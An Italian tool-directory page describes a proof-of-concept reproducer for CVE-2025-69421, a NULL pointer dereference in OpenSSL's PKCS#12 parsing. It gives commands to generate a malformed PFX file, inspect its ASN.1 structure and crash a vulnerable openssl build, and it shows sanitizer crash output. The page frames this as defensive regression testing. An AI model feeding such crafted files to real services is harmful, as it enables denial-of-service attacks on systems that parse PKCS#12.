Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-CVE-2025-69421 — Minimo riproduttore di CVE-2025-69421 che dimostra un dereferenziamento di puntatore nullo nell'elaborazione PKCS#12 di OpenSSL tramite un file PFX malformato con campo encryptedContent assente. Include script di generazione, ispezione ASN.1 e output di crash attivato da UBSan per test di regressione difensivi. | Kitploit
Strumenti/GitHubGitHub/kha-beleh/poc-cve-2025-69421
Analisi delle VulnerabilitàExploitFuzzingCrittografiaAnalisi di BinariApprendimento e Formazione
GitHubkha-beleh/poc-cve-2025-69421

PoC-CVE-2025-69421

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Minimo riproduttore di CVE-2025-69421 che dimostra un dereferenziamento di puntatore nullo nell'elaborazione PKCS#12 di OpenSSL tramite un file PFX malformato con campo encryptedContent assente. Include script di generazione, ispezione ASN.1 e output di crash attivato da UBSan per test di regressione difensivi.

Condividi

Riproduttore solo crash CVE-2025-69421

Questo repository contiene un file PKCS#12 malformato minimale che riproduce la CVE-2025-69421 in un ambiente di laboratorio isolato.

Il PFX generato contiene un EncryptedData il cui EncryptedContentInfo omette il campo opzionale encryptedContent. Le versioni vulnerabili di OpenSSL possono passare un puntatore ASN1_OCTET_STRING NULL da PKCS12_unpack_p7encdata() a PKCS12_item_decrypt_d2i_ex(), che lo dereferenzia senza un controllo NULL.

Questo riproduttore dimostra solamente una condizione di denial-of-service. Non esegue codice né divulga informazioni.

Contenuto del repository

root@kitploit:~
.
├── README.md
├── LICENSE
├── Makefile
├── generate.py
├── run.sh
├── malformed-cve-2025-69421.p12
└── evidence
    └── ubsan-output.txt

Requisiti

  • Python 3
  • Una build vulnerabile di OpenSSL compilata con UBSan o ASan/UBSan
  • OpenSSL 3.0.7 è stata utilizzata per la riproduzione confermata

Imposta la directory di build prima di eseguire il PoC:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
export OPENSSL_BIN="$OPENSSL_BUILD/apps/openssl"

OPENSSL_BUILD deve contenere la libcrypto.so.3 vulnerabile e il binario apps/openssl corrispondente.

Genera il file PKCS#12 malformato

Un file pre-generato è incluso. Per ricrearlo:

root@kitploit:~
python3 generate.py

L'output è:

root@kitploit:~
malformed-cve-2025-69421.p12

Ispeziona la struttura ASN.1

root@kitploit:~
openssl asn1parse \
  -inform DER \
  -in malformed-cve-2025-69421.p12 \
  -i

La struttura rilevante è:

root@kitploit:~
PFX
├── version = 3
└── authSafe: ContentInfo(data)
    └── OCTET STRING
        └── AuthenticatedSafe
            └── ContentInfo(encryptedData)
                └── EncryptedData
                    ├── version = 0
                    └── EncryptedContentInfo
                        ├── contentType = data
                        ├── algorithm = pbeWithSHA1And3-KeyTripleDES-CBC
                        └── encryptedContent = absent

Esegui il riproduttore

Utilizzando lo script di supporto:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
./run.sh

Comando manuale equivalente:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
export OPENSSL_BIN="$OPENSSL_BUILD/apps/openssl"

ASAN_OPTIONS='abort_on_error=1:halt_on_error=1:detect_leaks=0:symbolize=1' \
UBSAN_OPTIONS='halt_on_error=1:print_stacktrace=1' \
LD_LIBRARY_PATH="$OPENSSL_BUILD" \
"$OPENSSL_BIN" pkcs12 \
  -in malformed-cve-2025-69421.p12 \
  -info \
  -noout \
  -passin pass:test

Risultato atteso su una build vulnerabile

root@kitploit:~
Warning: MAC is absent!
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1
crypto/pkcs12/p12_decr.c:140:66: runtime error: member access within null pointer of type 'const struct ASN1_OCTET_STRING'
    #0 0x... in PKCS12_item_decrypt_d2i_ex (/path/to/openssl-build/libcrypto.so.3+0x...)
    #1 0x... in PKCS12_unpack_p7encdata (/path/to/openssl-build/libcrypto.so.3+0x...)
    #2 0x... in dump_certs_keys_p12 (/path/to/openssl-build/apps/openssl+0x...)
    #3 0x... in pkcs12_main (/path/to/openssl-build/apps/openssl+0x...)

Gli indicatori importanti sono:

root@kitploit:~
member access within null pointer
PKCS12_item_decrypt_d2i_ex
PKCS12_unpack_p7encdata

Risultato atteso su una build corretta

Una build corretta di OpenSSL dovrebbe rifiutare l'input malformato senza che il sanitizer trovi nulla o che il processo vada in crash. L'errore può includere:

root@kitploit:~
PKCS12_item_decrypt_d2i_ex:passed a null parameter

Riepilogo tecnico

root@kitploit:~
CVE: CVE-2025-69421
Component: OpenSSL PKCS#12 processing
Trigger: EncryptedData with absent encryptedContent
Fault: NULL pointer dereference
Function: PKCS12_item_decrypt_d2i_ex()
Reachable through: PKCS12_unpack_p7encdata()
Impact: Denial of Service

Dichiarazione di non responsabilità

Utilizza questo riproduttore solo su sistemi di tua proprietà o per i quali sei esplicitamente autorizzato a effettuare test. L'artefatto incluso è destinato alla validazione difensiva e ai test di regressione.

Scarica lo strumento